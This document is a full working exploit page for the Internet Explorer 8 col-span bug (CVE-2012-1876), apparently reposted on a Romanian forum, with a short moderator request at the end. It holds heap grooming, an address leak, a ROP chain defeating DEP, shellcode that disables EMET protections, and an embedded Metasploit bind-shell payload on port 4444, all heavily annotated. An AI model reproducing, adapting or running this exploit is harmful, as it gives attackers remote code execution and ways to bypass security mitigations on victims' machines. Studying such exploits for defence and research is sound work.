
Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass

<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
** Note: every ROP/import offset below is relative to the mshtml.dll of that exact
** IE build, the EMET offset to EMET 4.1.x, and the absolute 0x076dXXXX addresses
** embedded in the chain assume the heap-spray layout this script produces, unchanged.
** On any other build the chain crashes rather than degrading gracefully.
** The payload is a Metasploit bind shell listening on TCP/4444 - lab use only.
** CVE-2012-1876 has long been patched; a current IE8 build is not expected to be affected.
-->

<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>

/**
 * Reassemble a little-endian 32-bit value from two UTF-16 code units.
 *
 * @param {string} str  At least two code units; unit 0 is the low 16 bits,
 *                      unit 1 the high 16 bits (how the leak in get_leak()
 *                      sees a dword stored in a BSTR).
 * @returns {number}    The unsigned 32-bit value, or NaN if str is shorter
 *                      than two units (charCodeAt() past the end is NaN).
 *
 * Multiply instead of `<< 16`: a shift would flip the sign for values
 * >= 0x80000000, whereas the arithmetic form stays a positive number.
 * ES3 syntax only - this file targets IE8's JScript.
 */
function strtoint(str) {
  var low = str.charCodeAt(0);
  var high = str.charCodeAt(1);
  return high * 0x10000 + low;
}

// ---- Stage 0: heap grooming ------------------------------------------------
// Runs synchronously at page load, before the timers at the bottom fire.
// Three 512-unit source strings (4 -> 8 -> ... -> 512 by doubling); substring()
// below cuts 125-unit copies out of them. Contents are just fill patterns.
var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

// fr[] = strings that will be freed, al[]/bl[] = strings that stay.
// bl[498] is the one get_leak() later reads past the end of.
var fr = new Array();
var al = new Array();
var bl = new Array();

// Hidden container for the <button> elements created below.
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

// (0x100-6)/2 = 125 UTF-16 units = 250 bytes of payload; with a BSTR's 4-byte
// length prefix and 2-byte terminator that is a 0x100-byte allocation -
// presumably chosen to match the size class of the object the col-span bug
// corrupts (see the write-up linked in the header) - confirm.
// Only even indices are filled. One <button> per iteration is parked in the
// hidden div; the JS reference is dropped at once, the DOM keeps it alive.
// heapspray()'s parameter name (cbuttonlayout) suggests these buttons own the
// object whose pointer is leaked - not verifiable from this file.
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}

// Drop every second fr[] string from index 200 up and force a collection
// after each one (CollectGarbage() is IE/JScript-only), opening 0x100-byte
// holes between the surviving al[]/bl[] strings. leak() later grows the
// <col> span so its reallocated buffer presumably lands in one of these holes
// next to bl[498] - inferred from get_leak()'s out-of-bounds read, confirm.
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}

/**
 * Stage 2 of 3 - build the ROP chain + payload and spray it (~100 MB).
 *
 * @param {number} cbuttonlayout  Despite the name, this is the number
 *   get_leak() hands over (leaked pointer minus a fixed constant). Every
 *   gadget/import address below is `cbuttonlayout + <offset>`, so it acts as
 *   the base of the module the offsets were taken from - presumably mshtml.dll
 *   of the exact build named in the header; any other build crashes on the
 *   first gadget.
 *
 * Layout of one 2000-byte spray unit (little-endian 32-bit words):
 *   28 bytes filler -> pivot (RET, POP EBP, XCHG EAX,ESP)
 *   -> EMET part 1 (pure ROP)            -> VirtualProtect chain (mona layout)
 *   -> 4 NOPs -> EMET part 2 (x86 code)  -> data block (2 IAT slots, 2 strings)
 *   -> NOPs -> msf bind shell            -> NOP padding to exactly 1000 UTF-16 units.
 * Part 1 and part 2 both embed ABSOLUTE 0x076dXXXX addresses pointing into
 * this unit, so the spray must reproduce the same layout on every run: do
 * not change the size of anything between the filler and the final pad.
 *
 * Address idiom used on every gadget: toString(16) gives 8 hex digits,
 * digits 4..8 are the low word and 0..4 the high word, emitted low word first
 * via %u escapes (little-endian). Fewer than 8 digits (base < 0x10000000)
 * would silently yield wrong words; not expected for a DLL base.
 *
 * Keep this file ES3: IE8's JScript has no const/let/template literals.
 * The repeated `var rop = ...` redeclarations are legal there - each just
 * overwrites the previous value. The `// } RET` tags on the high-word lines
 * are leftovers of the author's template and carry no meaning.
 */
function heapspray(cbuttonlayout) {
// Release the fr[] strings nulled during grooming before allocating the spray.
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8); // low word, emitted first
var rop2 = rop.substring(0,4); // high word

var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 5504544; // Writable location (scratch dword for lpflOldProtect)
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 4936; // VirtualProtect() IAT slot (small offset = import table near module start); dereferenced in the chain
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET


var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2228408; // POP ECX (second gadget, used by the EMET part)
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1586172; // POP EAX (second gadget, used by the EMET part)
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET

var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW IAT slot
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET

var getprocaddr = cbuttonlayout + 4836; // GetProcAddress IAT slot
var getprocaddr = getprocaddr.toString(16);
var getprocaddr1 = getprocaddr.substring(4,8);
var getprocaddr2 = getprocaddr.substring(0,4); // } RET

// 28 bytes of filler; the pivot below must sit at the offset the hijacked
// indirect call lands on (determined by the overflow, not visible here).
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING

shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN - stack pivot: from here ESP walks down this unit and every word is consumed by a RETN

// EMET disable part 0x01 - zero one dword inside EMET.dll using ROP only.
// (The linked write-up describes this as EMET's global switch; what lives at
// EMET.dll+0x7e220 is not visible here, confirm against EMET 4.1.x.)
//   EAX = *(base+4840)          -> GetModuleHandleW
//   PUSH EAX # RETN             -> returns INTO GetModuleHandleW
//   GetModuleHandleW(L"EMET")   -> EAX = EMET.dll base; returns to POP ECX
//   EAX += 0x0007e220 ; *EAX = 0
//   ADD ESP,0C                  -> step over the 12 bytes of inline string data
// If EMET.dll is not loaded, GetModuleHandleW returns NULL and the write to
// 0x0007e220 faults: this chain is EMET-specific, not EMET-optional.
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW IAT slot -> EAX
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN - EAX = GetModuleHandleW
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN - call GetModuleHandleW
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN - its return address
shellcode+= unescape("%u101C%u076d"); // its argument: ABSOLUTE address of the L"EMET" string below inside this sprayed unit
shellcode+= unescape("%ue220%u0007"); // 0x0007e220 -> ECX: offset inside EMET.dll (EMET 4.1.x specific)
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // 0 -> ECX
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN - *(EMET.dll+0x7e220) = 0
shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN - skip the 12 data bytes that follow
shellcode+= "EMET"; // L"EMET" as UTF-16 (8 bytes)
shellcode+= unescape("%u0000%u0000"); // wide NUL + pad (4 bytes); 12 bytes total with the string
// EMET disable part 0x01 end

// VirtualProtect chain in the standard mona PUSHAD layout. Registers loaded:
//   EBP = POP EBP gadget (return address after VirtualProtect),
//   EBX = size 0x1024, EDX = 0x40 (PAGE_EXECUTE_READWRITE),
//   ECX = writable scratch dword (lpflOldProtect), EDI = RETN, ESI = JMP EAX,
//   EAX = VirtualProtect (IAT slot, then MOV EAX,[EAX] to dereference).
// PUSHAD lays them out so the RETNs reach JMP EAX -> VirtualProtect with ESP
// (i.e. this sprayed unit) as lpAddress; PUSH ESP # RETN then jumps into the
// now-RWX stack, i.e. the NOPs and machine code that follow.
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // value for EBP: address of that same POP EBP # RETN gadget
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX # RETN (not "POP EBP": rop7/rop8 is the POP EBX gadget)
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 -> EBX
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX # RETN
shellcode+= unescape("%u0040%u0000"); // 0x00000040 = PAGE_EXECUTE_READWRITE -> EDX
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX # RETN
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location -> ECX (lpflOldProtect)
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI # RETN
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN -> EDI
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX -> ESI
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX # RETN
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() IAT slot -> EAX
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] # RETN - EAX = VirtualProtect
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD # RETN
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP # RETN - execute from the stack
shellcode+= unescape("%u9090%u9090"); // NOPs: landing pad, falls through into part 2

// EMET disable part 0x02 - raw x86 code (runs once the unit is RWX), decoded
// from the %u words below:
//   mov eax,0x076d10c0 ; mov eax,[eax] ; mov eax,[eax]      -> GetModuleHandleW
//   push 0x076d10c8 ; call eax                               -> hmod = GetModuleHandleW(L"NTDLL")
//   push 0x076d10d4 ; push eax
//   mov eax,0x076d10c4 ; mov eax,[eax] ; mov eax,[eax] ; call eax
//                                                            -> GetProcAddress(hmod,"NtSetContextThread") ; mov esi,eax
//   sub esp,0x2cc ; mov dword [esp],0x00010010               -> CONTEXT on the stack (x86 CONTEXT = 0x2cc bytes),
//                                                               ContextFlags = CONTEXT_DEBUG_REGISTERS
//   mov edi,esp ; mov ecx,0x2cc ; add edi,4 ; sub ecx,4 ; xor eax,eax ; rep stosb  -> zero the rest
//   push esp ; push -2 ; call esi                            -> NtSetContextThread(GetCurrentThread(), &ctx)
//   nop x6 ; jmp short +0x29                                 -> over the data block into the NOPs below
// Net effect: DR0-DR7 of the current thread are cleared. EAF presumably
// depends on those hardware breakpoints (see the linked write-up) - confirm.
// The four 0x076d10xx constants are ABSOLUTE addresses of the data block
// below and only hold if the spray layout is reproduced exactly.
// Execute the Corbomite bluff to disarm EAF
shellcode+= unescape("%uc0b8%u6d10");
shellcode+= unescape("%u8b07%u8b00");
shellcode+= unescape("%u6800%u10c8");
shellcode+= unescape("%u076d%ud0ff");
shellcode+= unescape("%ud468%u6d10");
shellcode+= unescape("%u5007%uc4b8");
shellcode+= unescape("%u6d10%u8b07");
shellcode+= unescape("%u8b00%uff00");
shellcode+= unescape("%u8bd0%u81f0");
shellcode+= unescape("%uccec%u0002");
shellcode+= unescape("%uc700%u2404");
shellcode+= unescape("%u0010%u0001");
shellcode+= unescape("%ufc8b%uccb9");
shellcode+= unescape("%u0002%u8300");
shellcode+= unescape("%u04c7%ue983");
shellcode+= unescape("%u3304%uf3c0");
shellcode+= unescape("%u54aa%ufe6a");
shellcode+= unescape("%ud6ff%u9090");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u29eb"); // NOPs + jmp short +0x29 (skips the data block)
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // data block @0x076d10c0: GetModuleHandleW IAT slot
shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // @0x076d10c4: GetProcAddress IAT slot
shellcode+= "NTDLL"; // @0x076d10c8: L"NTDLL" (UTF-16, 10 bytes)
shellcode+= unescape("%u0000"); // wide NUL
shellcode+= unescape("%u744e%u6553"); // @0x076d10d4: "NtSetContextThread" as ANSI bytes (GetProcAddress takes a narrow string)
shellcode+= unescape("%u4374%u6e6f");
shellcode+= unescape("%u6574%u7478");
shellcode+= unescape("%u6854%u6572");
shellcode+= unescape("%u6461%u0000");
shellcode+= unescape("%u9090%u9090"); // NOPs - the jmp above lands here
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end

// Payload: Metasploit windows/shell_bind_tcp, listens on TCP 4444 on the
// victim (no egress needed, but trivially scannable). Lab use only.
// A payload of a different size changes only the NOP padding below, so the
// absolute addresses above keep working as long as the unit still ends up
// exactly 1000 UTF-16 units - which the padding logic guarantees only while
// the payload fits in the remaining room.
// Bind shellcode on 4444
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability

shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");

// Pad the unit to exactly 1000 UTF-16 units (2000 bytes). NB: if shellcode
// is already longer than 1000 units the substr length goes negative, the pad
// becomes "" and the unit is no longer 1000 units - the absolute 0x076dXXXX
// addresses then stop lining up.
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);

shellcode+= padding;

// Replicate the unit until the string is >= 100000 units (ends at 128000).
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;

// One spray block = 16 x 32768 units minus 19 units = 1 MB - 38 bytes.
// The 38 bytes presumably leave room for the string's heap/BSTR header so
// that each block occupies exactly 1 MB - confirm.
var onemeg = shellcode.substr(0, 64*1024/2);

for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}

onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

var spray = new Array();

// 100 blocks, ~100 MB. substr() is used so that each element is a fresh copy
// (presumably; a plain `spray[i] = onemeg` would store 100 references to one
// string and allocate nothing new).
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}

/**
 * Stage 1 of 3 - the information leak.
 *
 * Re-sets the width of the fixed-layout <col id="132"> to its markup value
 * (41) and grows its span from 9 to 19. The width assignment is kept even
 * though the value does not change; only the span grows here. Per get_leak()
 * this first write presumably corrupts the length of an adjacent BSTR
 * (bl[498]) so that it can be read past its end - confirm.
 *
 * Globals read: document. No return value. ES3 only (IE8).
 */
function leak() {
  var col = document.getElementById("132");
  var width = "41";
  var span = "19";
  col.width = width;
  col.span = span;
}

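/**
 * Stage 2 of 3 - turn the corrupted bl[498] into a module base.
 *
 * Reads UTF-16 units 136..137 of bl[498], i.e. 11 units past the 125-unit
 * payload the string was created with. That read is only meaningful if
 * leak() enlarged the string's BSTR length prefix, so substring() now
 * returns heap memory that follows the string - presumably a pointer into
 * mshtml (the parameter name in heapspray() hints at a CButtonLayout
 * vtable) - confirm. Subtracting 1410704 (0x158690) yields the value
 * heapspray() adds all its gadget offsets to; the constant is valid only
 * for the build named in the header.
 *
 * Side effect: schedules heapspray(base) 50 ms later via setTimeout.
 * Globals read: bl, strtoint, heapspray. No return value. ES3 only (IE8).
 */
function get_leak() {
  var leaked = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
  var base = leaked - 1410704;
  // Debug aid when porting to another build: alert(base.toString(16)).
  setTimeout(function(){heapspray(base)}, 50);
}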

/**
 * Stage 3 of 3 - the controlling overflow.
 *
 * Sets the same <col id="132"> to width 1245880 and span 44. With
 * table-layout:fixed these values feed the CVE-2012-1876 col-span bug; the
 * sprayed ROP chain from heapspray() must already be in memory when this
 * fires (see the timers at the bottom of the script).
 *
 * Globals read: document. No return value. ES3 only (IE8).
 */
function trigger_overflow() {
  var col = document.getElementById("132");
  var width = "1245880";
  var span = "44";
  col.width = width;
  col.span = span;
}

// Stage timeline (ms after load); the grooming above already ran synchronously.
//   400  leak():             <col> span 9 -> 19 (first write; presumably corrupts
//                            the neighbouring BSTR length - see get_leak)
//   450  get_leak():         read past bl[498], derive the base, schedule heapspray() +50 ms
//   700  trigger_overflow(): width 1245880 / span 44 - the write that hijacks control
// The gaps are timing assumptions, not guarantees: heapspray() allocates
// ~100 MB at ~500 ms and presumably must have finished before 700 ms; on a
// slow machine the trigger may fire into an incomplete spray.
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);

</script>
</body>
</html>


// Da, ai dreptate, nu vazusem... de fapt nici titlul nu-i chiar sugestiv. Rog un moderator sa mute/stearga topicul.
